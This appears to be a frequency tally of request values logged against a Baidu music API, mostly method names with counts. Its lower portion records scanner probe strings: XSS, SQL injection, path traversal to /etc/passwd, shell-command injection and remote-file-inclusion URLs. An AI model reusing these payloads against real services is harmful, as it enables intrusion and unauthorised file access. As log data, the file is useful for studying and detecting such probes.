baidu.ting.song.getInfos	58371073
baidu.ting.song.baseInfo	27048111
baidu.ting.search.lrcpic	24637902
baidu.ting.search.catalogSug	21709227
baidu.ting.user.listenAge	17330417
baidu.ting.song.play	15912051
baidu.ting.search.common	13292708
baidu.ting.song.down	8772049
baidu.ting.user.getUserBaseInfo	7168283
baidu.ting.song.lry	7032368
baidu.ting.user.registToUC	6003371
baidu.ting.artist.getSongList	5233464
baidu.ting.song.getInfo	4938597
ting.baidu.diy.getPlaylists	4839940
baidu.ting.artist.getList	4666581
baidu.ting.search.lrcys	4605324
baidu.ting.favorite.isCollect	4415120
baidu.ting.billboard.billList	4296458
baidu.ting.search.getPhotoInfos	4237730
baidu.ting.user.checkSuggestVersion	3750419
baidu.ting.game.gamedetail	3265720
baidu.ting.user.config	2988406
baidu.ting.diy.gedanInfo	2926419
baidu.ting.plaza.getRecommendAlbum	2922426
baidu.ting.user.checkComVersion	2770314
baidu.ting.artist.getInfo	2647448
baidu.ting.plaza.active	2562948
baidu.ting.active.start	2497324
baidu.ting.radio.playAction	2439553
baidu.ting.plaza.getFocusPic	2002626
baidu.ting.diy.gedanHot	1555223
baidu.ting.search.suggestion	1390023
baidu.ting.radio.getChannelSong	1350765
baidu.ting.artist.getinfo	1313666
baidu.ting.album.getAlbumInfo	1270717
baidu.ting.diy.category	1219784
baidu.ting.user.getMessage	1208832
ting.baidu.plaza.recdaily	1205156
baidu.ting.favorite.getCollectSong	1175969
baidu.ting.diy.getSongFromOfficalList	1055374
baidu.ting.diy.addListenCount	1032043
baidu.ting.plaza.recdaily	1003223
baidu.ting.diy.getNowOfficalList	919423
baidu.ting.plaza.getPartDesc	911206
baidu.ting.artist.getAlbumList	785687
baidu.ting.song.audio	704214
baidu.ting.user.down	696496
	683953
baidu.ting.user.RegistToImsg	675271
baidu.ting.diy.gedan	672337
baidu.ting.feedback.song	645047
baidu.ting.tag.songlist	635169
baidu.ting.tag.getHotTag	606040
baidu.ting.radio.getCategoryList	427959
baidu.ting.search.getPhotoInfo	345648
baidu.ting.billboard.billCategory	338966
baidu.ting.search.lrcyss	327060
baidu.ting.artist.get72HotArtist	277111
baidu.ting.diy.getPlaylists	261573
baidu.ting.song.playAAC	222538
baidu.ting.game.gamelist	197159
baidu.ting.plaza.recommend	186965
baidu.ting.favorite.getFavoriteSong	185878
baidu.ting.song.buffer	158388
baidu.ting.video.getList	151662
baidu.ting.song.getMulInfos	130954
baidu.ting.favorite.addSongFavorites	123812
baidu.ting.tag.getAllTag	108125
baidu.ting.diy.search	98670
baidu.ting.mv.getIndexMV	97855
baidu.ting.diy.getSimilarGedan	94947
baidu.ting.favorite.addSongFavorite	90736
baidu.ting.diy.getOfficialDiyList	83427
baidu.ting.user.nplogin	81257
baidu.ting.video.play	72731
baidu.ting.user.checkVersion	55782
baidu.ting.plaza.getNewSongs	43509
baidu.ting.favorite.delCollectSong	42813
baidu.ting.mv.playMV	39388
baidu.ting.artist.getSpecialSongList	37579
ting.baidu.diy.getPlaylist	31877
baidu.ting.radio.getArtistChannelSong	26574
baidu.ting.radio.getFavoriteSong	22788
baidu.ting.plaza.getArtistPlaza	17711
baidu.ting.diy.getPlaylist	17627
baidu.ting.radio.serv	17059
baidu.ting.feedback.crash	13655
baidu.ting.artist.getHighSongTitle	13183
baidu.ting.album.getList	11134
baidu.ting.diy.saveList	10594
ting.baidu.film.getFilmInfo	10572
baidu.ting.mv.searchMV	10132
baidu.ting.favorite.delSongFavorite	7407
baidu.ting.song.getMulInfo	7381
baidu.ting.artist.getQianQianArtist	6781
baidu.ting.song.cloud	6601
baidu.ting.diy.addListSong	5743
baidu.ting.weixin.response	4966
baidu.ting.diy.delListSong	4455
baidu.ting.user.logout	4276
baidu.ting.diy.delList	4195
baidu.ting.video.category	4169
baidu.ting.billboard.catalog	3960
baidu.ting.colorRing.listen	3385
ting.baidu.song.lry	3374
baidu.ting.user.regPassport	3355
baidu.ting.artist.getHighSongList	3343
ting.baidu.artistapp.renum	2836
baidu.ting.user.getMobileVcode	2518
baidu.ting.colorRing.getCode	2389
baidu.ting.colorRing.authset	2293
baidu.ting.favorite.delSongFavorites	1796
baidu.ting.diy.getRecommendSpeical	1728
baidu.ting.mv.getMultiSongMVInfo	1677
baidu.ting.feedback.info	1485
baidu.ting.favorite.getFavoriteAlbum	1363
baidu.ting.artist.getSongRank	1332
baidu.ting.artist.getSong	1290
ting.baidu.artistapp.brief	836
baidu.ting.mv.getMVCategory	810
baidu.ting.favorite.getListenHistory	699
baidu.ting.diy.addList	680
baidu.ting.diy.upList	598
baidu.ting.video.recMv	575
baidu.ting.artist.getInfoList	567
ting.baidu.search.lrcpic	565
baidu.ting.favorite.getOffenListenList	427
baidu.ting.song.getSuoSongInfo	351
baidu.ting.colorRing.toneset	347
baidu.ting.colorRing.subscribe	338
baidu.ting.artist.getInfoByName	294
ting.baidu.plaza.getFocusPic	289
baidu.ting.user.activate	280
baidu.ting.artistapp.photo	262
baidu.ting.favorite.addAlbumFavorite	239
baidu.ting.favorite.getInfoFromView	224
baidu.ting.user.login	182
ting.baidu.artistapp.news	148
ting.baidu.artistapp.newList	135
ting.baidu.diy.search	130
ting.baidu.album.getAlbumInfo	107
baidu.ting.song.getHash	97
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	95
baidu.ting.favorite.delAlbumFavorite	92
baidu.ting.user.addPassportInfo	92
baidu.ting.outerPassport.profile	73
baidu.ting.plaza.getMisNewSong	50
ting.baidu.artistapp.briefs	43
baidu.ting.album.getAlbumstyle	38
\' (	30
(	30
ting.baidu.billboard.billlist	25
baidu.ting.game.catalog	17
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	15
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	15
ting.baidu.artistapp.send	13
ting.baidu.mv.searchMV	11
file:///etc/rc.d/rc.local	10
file:///etc/passwd_	10
c:/windows/win.ini_	10
../../../../../../../../../../etc/passwd_	10
baidu.ting.song.lry\';alert(1);\'	10
${@print(md5(812812))}	10
1;cat /etc/rc.d/rc.local;	10
1\\\";cat /etc/rc.d/rc.local;\\\"	10
file:///etc/passwd	10
http://cirt.lnet/rfiinc.txt	10
c:/windows/win.ini	10
string:{var_dump(md5(812812))}	10
/usr/bin/id;	10
%{	10
${	10
\'];${@print(md5(812812))};//	10
1\';cat /etc/rc.d/rc.local;\'	10
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	10
baidu.ting.song.play\';alert(1);\'	10
http://cirt.lnet/rfiinc.txt_	10
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	10
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	10
../../../../../../../../../../etc/rc.d/rc.local_	10
../../../../../../../../../../etc/rc.d/rc.local	10
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	10
file:///etc/rc.d/rc.local_	10
../../../../../../../../../../etc/passwd	10
set	10
baidu.ting.album.getSongList	9
ting.baidu.mv.getArtistMVInfo	8
ting.baidu.game.gamedetail	8
baidu.ting.user.checkNameUsed	7
baidu.ting.bil	6
ting.baidu.artist.getAlbumList	6
baidu.ting.song.lry\'\";alert(1);//	5
baidu.ting.song.play\";alert(1);\"	5
baidu.ting.song.lry\";alert(1);\"	5
http://cirt.lnet/rfiinc.txt_.php	5
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	5
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	5
baidu.ting.song.play;alert(1);//	5
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	5
baidu.ting.song.lry;alert(1);//	5
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	5
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	5
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	5
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	5
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	5
baidu.ting.song.play</textarea></title><script>alert(1)</script>	5
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	5
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	5
baidu.ting.song.lry--></script><script>alert(1)</script>	5
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	5
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	5
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	5
baidu.ting.song.play--></script><script>alert(1)</script>	5
../../../../../../../../../../etc/passwd_.htm	5
baidu.ting.song.play</script><script>alert(1);//	5
baidu.ting.song.play<script>confirm(1)</script>	5
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	5
baidu.ting.song.lry</script><script>alert(1);//	5
baidu.ting.song.lry<script>confirm(1)</script>	5
baidu.ting.song.play\') and 8288=8288 and (\'	5
baidu.ting.song.play>\'>\"><script>alert(1)</script>	5
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	5
baidu.ting.song.lry\') and 8288=8288 and (\'	5
baidu.ting.diy	5
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	5
baidu.ting.song.play\' and \'8281\'=\'8281	5
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	5
baidu.ting.song.lry\' and \'8281\'=\'8281	5
baidu.ting.song.playjavascript:alert(1)	5
baidu.ting.song.lryjavascript:alert(1)	5
baidu.ting.song.play\'\";alert(1);//	5
ting.baidu.feedback.crash	4
ting.baidu.mv.getMultiSongMVInfo	4
ting.baidu.song.audio	4
ting.baidu.mv.getindexmv	4
c:/windows/win.ini_.html	4
file:///etc/rc.d/rc.local_.php	4
../../../../../../../../../../etc/rc.d/rc.local_.html	4
ting.baidu.plaza.active	4
ting.baidu.game.catalog	4
file:///etc/passwd_.php	4
ting.baidu.mv.playmv	4
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	4
ting.baidu.diy.gedan	4
ting.baidu.search.playback	4
ting.baidu.plaza.recommend	4
baidu.ting.art	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	3
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpeg	3
baidu.ting.sea	3
baidu.ting.song.info	3
ting.baidu.mv.getMVCategory	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpeg	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpg	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.htm	3
bbidu.ting.user.listenAge	2
http://cirt.lnet/rfiinc.txt_.html	2
http://10.42.7.217/?1385669916.97	2
http://10.42.7.217/?1385669915.66	2
http://10.42.7.217/?1385641884.08	2
http://10.42.7.217/?1385641875.06	2
http://10.42.7.217/?1385636546.94	2
http://10.42.7.217/?1385636540.25	2
http://10.42.7.217/?1385631169.59	2
http://10.42.7.217/?1385631167.23	2
http://10.42.7.217/?1385630595.43	2
file:///etc/passwd_.jpeg	2
http://cirt.lnet/rfiinc.txt_.htm	2
http://10.42.7.217/?1385659118.2	2
baidu.ting.alb	2
file:///etc/rc.d/rc.local_.html	2
baidu.ting.se	2
file:///etc/rc.d/rc.local_.jpg	2
baidu.ting.game.gameplay	2
baidu.ting.album	2
ting.baidu.diy	2
baidu.ting.album.getInfo	2
ting.baidu.song.down	2
baidu.ting.son	2
file:///etc/passwd_.htm	2
c:/windows/win.ini_.jpg	2
c:/windows/win.ini_.php	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.php	2
baidu.ting.song.getinfo	2
baidu.ting.pla	2
../../../../../../../../../../etc/passwd_.jpeg	2
../../../../../../../../../../etc/passwd_.html	2
baidu.ting.fav	2
ting.baidu.user.checkSuggestVersion	1
baidu.ting.ar	1
http://cirt.lnet/rfiinc.txt_.jpg	1
file:///etc/passwd_.html	1
c:/windows/win.ini_.jpeg	1
file:///etc/rc.d/rc.local_.jpeg	1
baidu.tingngid=464032	1
baidu.ting.getalbum	1
file:///etc/rc.d/rc.local_.htm	1
baidu.ting.song.infos	1
baidu.ting.sear%-	1
